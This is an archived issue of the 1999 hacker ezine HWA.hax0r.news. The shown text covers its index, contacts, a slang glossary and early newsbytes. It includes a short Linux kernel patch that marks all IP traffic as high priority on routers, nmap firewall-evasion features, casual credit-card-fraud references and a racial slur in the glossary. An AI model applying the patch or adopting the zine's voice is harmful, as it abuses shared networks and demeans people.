💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn13.… captured on 2022-01-08 at 15:59:07.
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 13 Volume 1 1999 April 1st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
On writing 'too technical' in an English assignment ....
she said "put it in laymen's terms"
i was thinking "you mean lamers' terms??" - <pr0xy_> *G*
010010 0101010101
01010101 0101010101010
010101 010101
010101 01010101
010101 01010101
010101 010101010
0010101010 01010100101010
0101010101 0101010101010
Note that some stuff may not display correctly as I did not fully convert
all the text contained in this file to html, it is recommended you read
this file in standard text mode...
4445494c0494C554E4C554E
=------------------------------------------------------------------------=
=------------------------------------------------------------------------=
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #13
=-----------------------------------------------------------------------=
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #wierdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #13 Artificial intelligence is no match for natural stupidity.
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Why Business Fears Distributed Attacks...........................
04.0 .. April Popular Mechanics article: Hackers and Crackers............
05.0 .. What IS frame spoofing etc anyways?..............................
06.0 .. What should I fear from Java and ActiveX?........................
07.0 .. Some cool geek code (leetbuzz.c) to roll your led's from root....
08.0 .. Building a packet sniffer from the ground up Part I..............
09.0 .. CIAC Security advisory on HP-UX ftp,hpterm.......................
10.0 .. Sendmail DoS on versions up to latest 8.9.3......................
11.0 .. Xylan Omniswitch 'features' (DoS)................................
12.0 .. xfs (font server for X) bug, exploitability warning..............
12.1 .. xfsx.sh - Very simple shell script exploit code for the recently
discovered xfs security hole. By ArchAng3| of Death, Midgard
Security Team. .................................................
13.0 .. Bug allows remote systems to read local files remotely in MSIE5
14.0 .. Possible root/user level compromise in SCO TermVision............
15.0 .. Linux INSMOD exploit/vulnerability...............................
16.0 .. Webramp DoSability...............................................
17.0 .. HP Security bulletins (March 31).................................
18.0 .. VENGINE polymorphic mutation engine for the Melissa virus w/code.
18.1 .. [ISN] Virus camp split over melissa virus........................
18.2 .. [ISN] The Anarchic Lure of Virus Writing ........................
18.3 .. A shadowy bunch...Philly Inquirer................................
18.4 .. National Post "Hang Hackers like Coin Clippers"..................
18.5 .. Second victim, erh suspect fingered on Melissa virus in Europe...
19.0 .. Various vulnerabilities;.........................................
1. Overflow in CAC.Washington.EDU ipop3d 4.xx...................
2. Overflow in pine 4.xx (Linux)................................
3. Lockfile vunerability in pine 4.xx (Linux)...................
4. Lockfile vunerability in ipop3d 4.xx.........................
5. Linux 2.x IPC vunerability...................................
6. Linux 2.x mmap vunerability..................................
7. Midnight Commander 4.x bugs (x2).............................
20.0 .. AOLwatch news....................................................
21.0 .. AntiOnline and hacker attacks....................................
22.0 .. NATO fights Serbs online.........................................
23.0 .. Chicago man sues employer over having weak voicemail security....
24.0 .. Mitnick speaks in a rare Q and A, (Forbes).......................
25.0 .. Australian stock exchange to carry out threat on Y2K slackers....
26.0 .. Hack your Palm V to add eight mb of ram!.........................
27.0 .. MDT software mentioned in last issue warrants arrests............
28.0 .. Hot on the trail of infamous hacker/cracker Zyklon, BUSTED!......
28.1 .. Rebuttal by Fluxx;..............................................
29.0 .. Atlanta based ISS looks to hire hackers from OZ..................
30.0 .. More on hacktivism from the Boston Globe.........................
31.0 .. Some nasty WinGate 3.0 DoS's, password fun and other probs.......
32.0 .. Sekure team releases problems found with ISS-scanner (rewt sploit!)
33.0 .. FileGuard crack, security vulnerabilities........................
34.0 .. Linux system administration mini-howto by Pestilence ............
35.0 .. Guide to using NMAP by Lamont Granquist .........................
36.0 .. Digital Unix 4.0 has potential root compromise in /var perms.....
37.0 .. Running Procmail <v3.l2? time to upgrade...(overflow conditions).
37.1 .. More procmail problems...........................................
38.0 .. Security hole in Java 2 (and JDK 1.1.x)..........................
39.0 .. Salon buys The Well..............................................
40.0 .. Gspot bounix interface replacement with enhancements from HiR....
41.0 .. Network Associates unveils middleware............................
42.0 .. [ISN] Book review: "Hacker Proof" Lars Klander 1997 .............
43.0 .. [ISN] The Year of PKI (Public Key Infrastructure)................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
"How to be a skr1pT Kiddi3" by DrHamstuh........................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
HOW.TO .. "How to hack" by our illustrious editor.........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
HiR:Hackers Information Report... http://axon.jccc.net/hir/
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls (HNN)..................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD ..............................http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+........................http://www.gammaforce.org/
News site+........................http://www.projectgamma.com/
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=cracker
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://www.l0pht.com/cyberul.html
http://www.hackernews.com/archive.html?122998.html
http://ech0.cjb.net ech0 Security
http://net-security.org Net Security
...
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ATTENTION: All foreign correspondants please check in or be removed by next
issue I need your current emails since contact info was recently lost in a
HD mishap and i'm not carrying any deadweight. Plus we need more people sending
in info, my apologies for not getting back to you if you sent in January I lost
it, please resend.
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
wierd crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra Pasty Drone
TwstdPair TheDuece _NeM_
D----Y RTFM99 Kevin Mitnick (watch yer back)
ypwitch kimmie vexxation
hunchback mack sAs72 Spikeman
and the #innerpulse, #hns crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ From securitysearch.net
We are pleased to inform you that Shake Communications has developed
Security Search - an IT security search engine and portal web site. As you
would expect, Security Search is free to use, and intended to become the
No.1 web site for finding information about IT security.
To view Security Search visit http://www.securitysearch.net
Please feel free to enter your company or personal and web site details
into the search engine. Also, if you wish to advertise on the site at any
stage please let us know.
Finally, if you have any suggestions or ideas for improvement we would
love to hear them.
Security Search
The Internet Security Search Engine
<a href="http://www.securitysearch.net/">Link</a>
++ contributed to HNN by Seraphic Artifex
Swatch is planning to broadcast a series of voice and
HTML text messages via an orbiting amateur
communications satellite in direct violation of
International Telecommunications Union treaty and U.S.
FCC regulations. Needless to say HAM Radio enthusiasts
are more than a little upset and have started a boycott of Swatch
<a href="http://www.wired.com/news/news/technology/story/18968.html">Wired Story</a>
<a href="http://wmbc.umbc.edu/rob/swatch-protest/">Swatch Protest site</a>
<a href="http://www.reston.com/nasa/watch.html">Nasa Watch</a>
<a href="http://www.hackernews.com/">HNN</a>
++ contributed to HNN by Code Kid
Los Alamos National Laboratory, Sandia National
Laboratories in Albuquerque and the Lawrence Livermore
National Laboratory in California have all suspended the
use of classified systems in an effort to raise security awareness.
<a href="http://www.msnbc.com/news/256510.asp">MSNBC</a>
<a href="http://www.zdnet.com/zdnn/stories/news/0,4586,2237463,00.html">ZD Net</a>
<a href="http://www.hackernews.com/">HNN</a>
++ nmap v2.12 is out! "nmap is a utility for port scanning large networks,
although it works fine for single hosts. The guiding philosophy for the
creation of nmap was TMTOWTDI (There's More Than One Way To Do It). This is
the Perl slogan, but it is equally applicable to scanners. Sometimes you need
speed, other times you may need stealth. In some cases, bypassing firewalls
may be required. Not to mention the fact that you may want to scan different
protocols (UDP, TCP, ICMP, etc.). You just can't do all this with one scanning
mode. And you don't want to have 10 different scanners around, all with different
interfaces and capabilities. Thus I [Fyodor] incorporated virtually every scanning
technique I [Fyodor] know into nmap. Specifically, nmap supports: Vanilla TCP
connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth)
scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP
fragments (bypasses packet filters), UDP raw ICMP port unreachable scanning, ICMP
scanning (ping-sweep), TCP Ping scanning, Remote OS Identification by TCP/IP
Fingerprinting, and Reverse-ident scanning. nmap also supports a number of
performance and reliability features such as dynamic delay time calculations,
packet timeout and retransmission, parallel port scanning, detection of down hosts
via parallel pings. Nmap also offers flexible target and port specification, decoy
scanning, determination of TCP sequence predictability characteristics, and output
to machine parseable or human readable log files." -- Fyodor. Changes: -sT now uses
a different method to determine the results of a non-blocking connect() call
(makes nmap more portable), got rid of the security warning message for people who
are missing /dev/random and /dev/urandom due to complaints about the warning (note:
This only silences the warnings -- it still uses relatively weak random number
generation under Solaris and other systems that lack this functionality), eliminated
pow() calls on Linux boxes to rectify a SIGSEGV condition, fixed an rpm problem.
322k. By Fyodor. http://www.insecure.org/nmap/
<a href="http://www.insecure.org/nmap/">nmap</a>
++ This patch sets the tos field for IP headers to high priority and
optimizes the IP connection for throughput, which has real effects on
cisco routers.
Since it is bad policy and if hundrets of lamers use it I wont like it.
But I even more dislike hidden information, I'll let you decide wether
to publish it, but if you decide to do it, please do it anonymously.
Thanks.
--- linux/net/ipv4/af_inet.c Thu Mar 25 18:23:34 1999
+++ linux/net/ipv4/af_inet.c Thu Mar 25 18:23:35 1999
@@ -408,6 +408,7 @@
sk->timer.function = &net_timer;
sk->ip_ttl=ip_statistics.IpDefaultTTL;
+ sk->ip_tos=IPTOS_PREC_INTERNETCONTROL + IPTOS_THROUGHPUT;
sk->ip_mc_loop=1;
sk->ip_mc_ttl=1;
-- name withheld at request of submitter (from PacketStorm)
http://www.genocide2600.com/~tattooman/new.shtml
<a href="http://www.genocide2600.com/~tattooman/new.shtml">New files</a>
++ sMonitor
Version 1.03 for Windows 95/98/NT
Copyright � 1998-1999 by Alexander Yarovy
Description
The program can be used to monitor Internet hosts and services running
on them continuously. It allows to create a list of Internet servers
and a task lists for each of them: pings and services to check: HTTP,
FTP, Telnet, SMTP, POP3, NNTP and any others. The complete list of
services and TCP ports according to RFC 1700 is included.
http://members.xoom.com/ayarovy/index.html
<a href="http://members.xoom.com/ayarovy/index.html">Link</a>
++ Melissa virus creator cans his lawyer
<a href="http://www.zdnet.com/zdnn/stories/news/0,4586,2237196,00.html">Story</a>
++ KeyPost to close
Australia Post is set to close down its KeyPost digital certificate
issuing authority, citing poor returns and a lower than expected
takeup. The closure is expected to take effect on August 1. KeyPost
was Australia's first commercial digital certificate authority (CA).
It kicked off operations in Victoria nearly two years ago, followed
by a nationwide rollout six months later. An Australia Post spokes
person told Newswire this afternoon that ditching KeyPost was a
commercial decision. "The takeup was lower than expected, and we had
anticipated greater interest from all areas of government," the
spokesperson said.
http://newswire.com.au/9904/kp.htm
<a href="http://newswire.com.au/9904/kp.htm">Story link</a>
++ Melissa man out on bail
David Smith, the man arrested for allegedly creating and spreading the
Melissa virus, will plead not guilty to a string of offences. According
to CNet reports, the 30-year-old New Jersey man told his lawyers from
Benedict & Altman that he would plead innocent to charges of interrupting
public communication, conspiracy to commit the offence, theft of computer
service, and wrongful access to computer systems. Smith has since been
released on $US100,000 ($A158,300) bail.
http://newswire.com.au/9904/ngmel.htm
<a href="http://newswire.com.au/9904/ngmel.htm">Story link</a>
++ Victorians step forward for IT&T awards
